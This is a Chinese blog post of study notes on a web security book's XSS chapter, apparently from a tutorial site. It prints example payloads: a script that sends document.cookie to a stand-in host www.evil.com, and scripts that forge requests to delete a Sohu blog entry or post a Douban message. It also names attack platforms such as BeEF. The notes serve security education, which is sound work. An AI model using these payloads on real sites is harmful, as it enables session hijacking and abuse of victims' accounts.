白帽子讲web安全笔记——XSS(一)

XSS  跨站脚本攻击

三种类型:1.反射型:简单的把用户输入的数据“反射”给浏览器

2.存储型:把用户输入的数据“存储”在服务器端   具有很强的稳定性

3.DOM Based:修改页面的DOM节点形成的

XSS攻击:

 

Cookie劫持

先加载一个远程脚本   

<script src=http://www.evil.com/evil.js></script>

在evil.js中,通过代码窃取Cookie

var img = document.createElement("img");
img.src = "http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);

 

 

构造GET和POST请求

删除搜狐博客

var img = document.creatElement("img");
img.src = "http://blog.sohu.com/manage/entry.do?m=delete&id=1556713012";
document.body.appendChild(img);

豆瓣发出新消息 、

var dd = document.creatElement("div");
document.body.appendChild(dd);
dd.innerHTML = '<form action="" method="post" id="xssform" name="mbform">'+
'<input type="hidden" value="JiUY" name="ck" />'+
'<input type="text" value="testtesttest" name="mb_text" />'+
'</form>'


document.getElementById("xssform".submit();

我们可以看到使用javascript模拟浏览器发包并不是一件困难的事。

 

 

XSS钓鱼

利用JavaScript在当前页面上“画出”一个伪造的登录框。

 

 

识别用户浏览器

alert(navigator.userAgent);

识别用户安装的软件

在IE中通过判断ActiveX控件的classid是否存在,来推测用户是否安装了该软件。

一些第三方软件也可能会泄露一些信息。比如Flash有一个system.capabilities对象,能够查询客户端电脑中的硬件信息。

浏览器的扩展和插件也能被XSS Payload扫描出来。

Firefox 的插件列表放在一个DOM对象中,通过查询DOM可以遍历出所有插件。

Firefox的扩展,可以在JavaScript中加载扩展图标,加载成功,则扩展存在。

 

 

CSS History Hack

利用style的vistied属性——如果用户曾经访问过某个链接,那么这个链接的颜色会变得与众不同。

 

获取用户的真实ip地址

 

XSS攻击平台:

Attack API、BeEF、XSS-Proxy

 

XSS终极武器   XSS Worm

 

调试JavaScript

Firebug、IE 8 Developer Tools、Fiddler、HttpWatch


 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值